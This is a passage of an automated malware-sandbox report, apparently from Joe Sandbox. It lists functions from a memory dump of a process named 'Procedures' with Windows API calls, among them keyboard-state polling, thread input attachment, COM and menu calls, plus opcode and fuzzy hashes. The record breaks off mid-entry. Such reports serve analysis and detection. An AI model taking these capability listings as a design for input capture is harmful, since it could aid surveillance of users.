                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7c2f65625fc8b87c0d590501b408ab86b1953507b6c6ca8c33f7c53d3e2d67f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 33e48e401e4f5ec2354f117301a9f1f5035a01f4d284b36473dbae093cde20d4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c2f65625fc8b87c0d590501b408ab86b1953507b6c6ca8c33f7c53d3e2d67f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53417035A00219EFCF15EFA5DC449AE7BB9FF08354F008469E969B7261DB30A949CF90
                                                                                                                                                                                                                                                                                                    Function 00E8A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00E8A65D
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00E8A6DE
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00E8A6F9
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00E8A713
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00E8A728
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00E8A740
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00E8A752
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00E8A76A
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00E8A77C
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00E8A794
                                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00E8A7A6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7af297ff814dd90834b6c9b78d996b70e20766e7b6662ec1d4275f5dfeea776
                                                                                                                                                                                                                                                                                                    • Instruction ID: c641fe5646f1430024883cf5d23ed2aa3077c835cc6caec1077be5f906bea75c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7af297ff814dd90834b6c9b78d996b70e20766e7b6662ec1d4275f5dfeea776
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 304196645047C96EFF31666088043A5BEB06B1134CF0CA17BD5CE7A5C2FB9599C8D753
                                                                                                                                                                                                                                                                                                    Function 00EA9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6bd2d07372c74856a3fb1f28bb115364f10dd90af3690a812bbce11bc50a3c8e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24dd99d0d3cc245a30c3bef0de2371b18a29e64780446cdf8eeff6ba731ee802
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bd2d07372c74856a3fb1f28bb115364f10dd90af3690a812bbce11bc50a3c8e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB51E731A00516ABCF14DF68C9415BEB3E5BF5A364B206229F466FB286DB35ED40C790
                                                                                                                                                                                                                                                                                                    Function 00EA4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32 ref: 00EA41D1
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00EA41DC
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00EC0B44,?), ref: 00EA4236
                                                                                                                                                                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00EA42A9
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA4341
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA4393
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a65dc4dbee35c6256749acef26a0e77c7d93d908b92946e4394e9035ca3574d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 75a7cf5484dc6ece0c53da3cd0da11c44b9e762f9ce316851ee4189bfaabc2e5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a65dc4dbee35c6256749acef26a0e77c7d93d908b92946e4394e9035ca3574d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E861A1B1608301DFC710DF65D849B5ABBE4AF8A714F001919F585AB2A1D7B0FD48CBA2
                                                                                                                                                                                                                                                                                                    Function 00E98BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00E98C9C
                                                                                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E98CAC
                                                                                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E98CB8
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E98D55
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98D69
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98D9B
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E98DD1
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E98DDA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: c0b9f4d24eb841a9fb2e3df8b680f5492d31bcbcba9e886d1467789e9378a0da
                                                                                                                                                                                                                                                                                                    • Instruction ID: 73350c2430f1b938642d1353ec47831c8685e52c37815dd714c99ebff99726e0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0b9f4d24eb841a9fb2e3df8b680f5492d31bcbcba9e886d1467789e9378a0da
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60616B725083159FCB10EF60D94099FB3E8FF8A314F04592EF989A7261EB31E945CB92
                                                                                                                                                                                                                                                                                                    Function 00E3FBC6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00E3FC41
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00E7FC15
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E639E2,00000004,00000000,00000000), ref: 00E7FC98
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 1268545403-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 024f6f2b5dc82db15b871cba3743ceaac629b3d96dc1b33a1b48be5c08015af4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 881791bf0279f2228947f8d4f98bbea6c2caf962bf93c6f2b7b850a4e3ebbb4c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 024f6f2b5dc82db15b871cba3743ceaac629b3d96dc1b33a1b48be5c08015af4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1415B30E483889EC7358B3AC99C7BAFFA1AB46304F14B53DE94A76960C631A844C719
                                                                                                                                                                                                                                                                                                    Function 00EB46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateMenu.USER32 ref: 00EB4715
                                                                                                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00EB4724
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB47AC
                                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00EB47C0
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00EB47CA
                                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB47F7
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00EB47FF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$F
                                                                                                                                                                                                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                    • Opcode ID: a09f4e481f504095d08aaab70976efd7f0b3248a00debbeb62f5265a8c38745a
                                                                                                                                                                                                                                                                                                    • Instruction ID: e957c83d35b5ac35d5f87b37a2751f0dbdb70221a9faf3726c94b286e3f31872
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a09f4e481f504095d08aaab70976efd7f0b3248a00debbeb62f5265a8c38745a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86419AB5A0120AEFDB28CF65D844EEA7BB5FF49314F14412DFA05A7391D770A914CB50
                                                                                                                                                                                                                                                                                                    Function 00E8282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E828B1
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00E828BC
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00E828D8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E828DB
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00E828E4
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E828F8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E828FB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: df0649aecc3316cccffd28ebaa61dc38e25400d8730da1aecab9fd84941b7a3c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3ba2e85c0caae1099377196a8d1a397b28465eb27f51eef3cf4ae00e6a33f631
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df0649aecc3316cccffd28ebaa61dc38e25400d8730da1aecab9fd84941b7a3c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD21F275900118BFCF05ABA1DC85DEEBBB4EF05350F00125AFA59B72E5DB755818CB60
                                                                                                                                                                                                                                                                                                    Function 00E8290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E82990
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00E8299B
                                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00E829B7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E829BA
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00E829C3
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E829D7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E829DA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: a3e1384393611dda217f55625d96e33d184dd27d8f5a47e8255ad2b3e98d22d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: f6f7038dd6fd9be2f01a304fc004eb58e9faa6835a474ee3d0b1dcde89279710
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3e1384393611dda217f55625d96e33d184dd27d8f5a47e8255ad2b3e98d22d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C21CF75900218BFCF05ABA0DC85EEEBBB8EF04340F005156FA59B71A5DB755818DB60
                                                                                                                                                                                                                                                                                                    Function 00EB44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EB4539
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EB453C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB4563
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EB4586
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EB45FE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EB4648
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EB4663
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EB467E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EB4692
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EB46AF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac83a5322b9a916c32e00129a4cb1807214b2d184a75422651734d52a6774ba4
                                                                                                                                                                                                                                                                                                    • Instruction ID: b72b5e76c3ccde3edcbe6bd91a857e717afbcba5b21af072b0bc859bea19cb38
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac83a5322b9a916c32e00129a4cb1807214b2d184a75422651734d52a6774ba4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66616AB5A00208AFDB10DFA8CC81EEE77F8EB49714F104159FA14B72E2D774AA45DB50
                                                                                                                                                                                                                                                                                                    Function 00E8BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E8BB18
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB2C
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00E8BB33
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB42
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8BB54
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB6D
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BB7F
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BBC4
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BBD9
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E8ABA8,?,00000001), ref: 00E8BBE4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
